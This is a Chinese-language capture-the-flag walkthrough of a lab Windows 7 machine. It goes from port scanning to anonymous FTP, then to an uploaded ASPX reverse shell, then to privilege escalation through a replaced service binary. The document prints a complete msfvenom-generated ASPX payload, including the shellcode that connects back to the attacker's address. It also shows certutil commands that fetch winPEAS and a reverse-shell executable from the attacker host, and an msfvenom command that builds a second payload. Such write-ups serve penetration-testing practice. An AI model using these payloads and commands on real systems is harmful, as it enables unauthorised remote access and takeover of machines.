quoted
quoted
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
┌──(kali㉿kali)-[~/temp/quoted]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.105:21
Open 192.168.10.105:445
Open 192.168.10.105:80
Open 192.168.10.105:135
Open 192.168.10.105:139
Open 192.168.10.105:5357
Open 192.168.10.105:49152
Open 192.168.10.105:49153
Open 192.168.10.105:49155
Open 192.168.10.105:49156
Open 192.168.10.105:49157
Open 192.168.10.105:49154
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 128 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-05-24 12:16PM <DIR> aspnet_client
| 10-05-24 12:27AM 689 iisstart.htm
|_10-05-24 12:27AM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 128 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS7
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:0B:1E:2F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: QUOTED-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat: NetBIOS name: QUOTED-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:0b:1e:2f (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
| QUOTED-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| QUOTED-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 08:00:27:0b:1e:2f:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: quoted-PC
| NetBIOS computer name: QUOTED-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-06-08T15:41:51+03:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 58509/tcp): CLEAN (Couldn't connect)
| Check 2 (port 48287/tcp): CLEAN (Couldn't connect)
| Check 3 (port 7707/udp): CLEAN (Timeout)
| Check 4 (port 10964/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-06-08T12:41:51
|_ start_date: 2025-06-08T12:36:01
|_clock-skew: mean: -59m54s, deviation: 1h43m55s, median: 5s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~/temp/quoted]
└─$ dirsearch -u http://$IP/ 2>/dev/null
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/temp/quoted/reports/http_192.168.10.105/__25-06-08_08-46-41.txt
Target: http://192.168.10.105/
[08:46:41] Starting:
[08:46:42] 403 - 312B - /%2e%2e//google.com
[08:46:42] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:46:42] 404 - 1KB - /.asmx
[08:46:42] 404 - 1KB - /.ashx
[08:46:52] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[08:47:10] 301 - 162B - /aspnet_client -> http://192.168.10.105/aspnet_client/
[08:47:10] 403 - 1KB - /aspnet_client/
[08:47:14] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:47:52] 404 - 1KB - /service.asmx
[08:48:01] 403 - 2KB - /Trace.axd
[08:48:02] 404 - 2KB - /umbraco/webservices/codeEditorSave.asmx
[08:48:07] 404 - 1KB - /WebResource.axd?d=LER8t9aS
Task Completed
漏洞发现
踩点
查看源代码但是并未发现有些啥,尝试别的方向。
ftp服务探测
前面探测到可以进行匿名登录,尝试看一下有些啥:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/temp/quoted]
└─$ ftp $IP
Connected to 192.168.10.105.
220 Microsoft FTP Service
Name (192.168.10.105:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> mget *
mget iisstart.htm [anpqy?]?
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
100% |************************************************************************************************************************************************| 689 0.98 MiB/s 00:00 ETA
226 Transfer complete.
689 bytes received in 00:00 (507.42 KiB/s)
mget welcome.png [anpqy?]?
229 Entering Extended Passive Mode (|||49163|)
150 Opening ASCII mode data connection.
100% |************************************************************************************************************************************************| 180 KiB 3.80 MiB/s 00:00 ETA
226 Transfer complete.
WARNING! 820 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
184946 bytes received in 00:00 (3.75 MiB/s)
然后发现正是web的目录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
┌──(kali㉿kali)-[~/temp/quoted]
└─$ cat iisstart.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#B3B3B3;
margin:0;
}
#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}
a img {
border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>
┌──(kali㉿kali)-[~/temp/quoted]
└─$ curl -s http://$IP/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#B3B3B3;
margin:0;
}
#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}
a img {
border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>
进行探测,看一下是否可以上传shell!因为是IIS所以尝试上传的为aspx的shell。。
上传aspx反弹shell
首先我们需要一个.aspx的木马,可以找现成的,也可以直接使用msf生成一个:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(kali㉿kali)-[~/temp/quoted]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3407 bytes
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
protected void Page_Load(object sender, EventArgs e)
{
byte[] my9L = new byte[460] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,
0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,
0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,
0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,
0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,
0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,
0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,
0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,
0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x04,0xd2,
0xc0,0xa8,0x0a,0x6a,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,
0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,
0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,0x6d,0x64,0x00,0x00,
0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,
0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,
0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,
0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,
0xba,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,
0x59,0x41,0x89,0xda,0xff,0xd5};
IntPtr vIGwqi5 = VirtualAlloc(IntPtr.Zero,(UIntPtr)my9L.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(my9L,0,vIGwqi5,my9L.Length);
IntPtr kHduZ8ZlHs = IntPtr.Zero;
IntPtr nDx9WQ2UEd = CreateThread(IntPtr.Zero,UIntPtr.Zero,vIGwqi5,IntPtr.Zero,0,ref kHduZ8ZlHs);
}
</script>
┌──(kali㉿kali)-[~/temp/quoted]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3409 bytes
尝试上传:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/temp/quoted]
└─$ ftp $IP
Connected to 192.168.10.105.
220 Microsoft FTP Service
Name (192.168.10.105:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49166|)
150 Opening ASCII mode data connection.
100% |************************************************************************************************************************************************| 3454 36.19 MiB/s --:-- ETA
226 Transfer complete.
3454 bytes sent in 00:00 (1.33 MiB/s)
ftp> exit
221 Goodbye.
┌──(kali㉿kali)-[~/temp/quoted]
└─$ curl -s http://$IP/shell.aspx
发现弹过来了!
提权
信息搜集
又是windows靶机,这段时间做了好几个了,尝试上传WinPEAS进行信息搜集!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
c:\Users\quoted\Desktop>dir
dir
C s�r�c�s�ndeki birimin etiketi yok.
Birim Seri Numaras�: D4DC-8644
c:\Users\quoted\Desktop dizini
06.10.2024 17:25 <DIR> .
06.10.2024 17:25 <DIR> ..
06.10.2024 17:25 23 user.txt
1 Dosya 23 bayt
2 Dizin 22.207.266.816 bayt bo�
c:\Users\quoted\Desktop>type user.txt
type user.txt
HMV{User_Flag_Obtained}
c:\Users\quoted\Desktop>certutil -urlcache -split -f http://192.168.10.106:8888/winPEAS.bat
certutil -urlcache -split -f http://192.168.10.106:8888/winPEAS.bat
**** �evrimi�i ****
0000 ...
9056
CertUtil: -URLCache komutu ba�ar�yla tamamland�.
c:\Users\quoted\Desktop>whoami /all
whoami /all
KULLANICI B�LG�LER�
-------------------
Kullan�c� ad� SID
============================ ========
nt authority\network service S-1-5-20
GRUP B�LG�LER�
--------------
Grup Ad� T�r SID �znitelikler
==================================== ================ ============================================================= ============================================================
Zorunlu Etiket\Sistem Zorunlu D�zeyi Etiket S-1-16-16384
Everyone �yi bilinen grup S-1-1-0 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
BUILTIN\Users Di�er Ad S-1-5-32-545 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\SERVICE �yi bilinen grup S-1-5-6 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
KONSOL OTURUMU A�MA �yi bilinen grup S-1-2-1 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\Authenticated Users �yi bilinen grup S-1-5-11 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\This Organization �yi bilinen grup S-1-5-15 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
BUILTIN\IIS_IUSRS Di�er Ad S-1-5-32-568 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
LOCAL �yi bilinen grup S-1-2-0 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
IIS APPPOOL\DefaultAppPool �yi bilinen grup S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
AYRICALIK B�LG�LER�
----------------------
Ayr�cal�k Ad� A��klama Durum
============================= ======================================================== ==========
SeAssignPrimaryTokenPrivilege ��lem d�zeyi belirtecini de�i�tir Devre D���
SeIncreaseQuotaPrivilege ��lem i�in bellek kotalar� ayarla Devre D���
SeSecurityPrivilege Denetimi ve g�venlik g�nl���n� y�net Devre D���
SeShutdownPrivilege Sistemi kapat Devre D���
SeAuditPrivilege G�venlik denetimleri olu�tur Devre D���
SeChangeNotifyPrivilege �apraz ge�i� denetimini atla Etkin
SeUndockPrivilege Bilgisayar� takma biriminden ��kar Devre D���
SeImpersonatePrivilege Kimlik do�rulamas�ndan sonra istemcinin �zelliklerini al Etkin
SeCreateGlobalPrivilege Genel nesneler olu�tur Etkin
SeIncreaseWorkingSetPrivilege ��lem �al��ma k�mesini art�r Devre D���
SeTimeZonePrivilege Saat dilimini de�i�tir
官网下的会在这里起冲突,我下载的是:https://github.com/Fa1c0n35/winPEAS,比较好用,不会报错,然后找到:
显示可能存在dll劫持,尝试构建相关文件进行替换劫持
DLL劫持提权
先搞一个木马:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/temp/quoted]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.106 lport=2345 -f exe > dotNet.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
将其上传以后尝试启动服务:
发现正常启动了,但是并未反弹shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
c:\Users\quoted\Desktop>certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
**** �evrimi�i ****
0000 ...
1c00
CertUtil: -URLCache komutu ba�ar�yla tamamland�.
c:\Users\quoted\Desktop>service PEService start
service PEService start
'service' i� ya da d�� komut, �al��t�r�labilir
program ya da toplu i� dosyas� olarak tan�nm�yor.
c:\Users\quoted\Desktop>sc start PEService
sc start PEService
[SC] StartService BA�ARISIZ OLDU, hata: 193.
才发现是下载错了地址。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
c:\Users\quoted\Desktop>cd ../../../
cd ../../../
c:\>certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
**** �evrimi�i ****
0000 ...
1c00
CertUtil: -URLCache komutu ba�ar�yla tamamland�.
c:\>sc start PEService
sc start PEService
[SC] StartService BA�ARISIZ - 1053:
Hizmet, belirli aral�klarla yap�lan ba�lama veya denetim iste�ine yan�t vermedi.
发现正常执行了,另一边shell也弹回来了!!!
拿到flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
C:\>cd Users/Administrator
cd Users/Administrator
C:\Users\Administrator>dir
dir
C s�r�c�s�ndeki birimin etiketi yok.
Birim Seri Numaras�: D4DC-8644
C:\Users\Administrator dizini
05.10.2024 00:09 <DIR> .
05.10.2024 00:09 <DIR> ..
05.10.2024 00:09 <DIR> Contacts
05.10.2024 18:23 <DIR> Desktop
05.10.2024 14:11 <DIR> Documents
05.10.2024 00:09 <DIR> Downloads
05.10.2024 00:09 <DIR> Favorites
05.10.2024 00:09 <DIR> Links
05.10.2024 00:09 <DIR> Music
05.10.2024 00:09 <DIR> Pictures
05.10.2024 00:09 <DIR> Saved Games
05.10.2024 00:09 <DIR> Searches
05.10.2024 00:09 <DIR> Videos
0 Dosya 0 bayt
13 Dizin 22.146.179.072 bayt bo�
C:\Users\Administrator>cd desktop
cd desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
HMV{Elevated_Shell_Again}
本文由作者按照 CC BY 4.0 进行授权